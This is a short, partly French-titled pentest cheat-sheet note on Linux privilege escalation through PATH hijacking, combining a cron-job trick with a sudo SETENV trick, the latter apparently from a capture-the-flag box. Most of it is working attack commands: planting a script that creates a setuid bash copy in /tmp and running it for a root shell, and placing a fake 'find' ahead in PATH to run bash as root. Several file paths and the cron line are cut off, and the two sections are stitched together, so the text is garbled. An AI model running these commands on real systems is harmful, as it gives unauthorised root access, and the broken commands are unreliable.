Ecrasement ENV

Cron path

For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

(Note how the user « user » has writing privileges over /home/user)

If inside this crontab the root user tries to execute some command or script without setting the path. For example: * * * * root Then, you can get a root shell by using:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/
#Wait cron job to be executed
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
# sudo -l
wizard photobomb = (root) SETENV: NOPASSWD: /opt/

find / -name (...)

cd /tmp
echo bash > find
chmod +x find
sudo PATH=$PWD:$PATH /opt/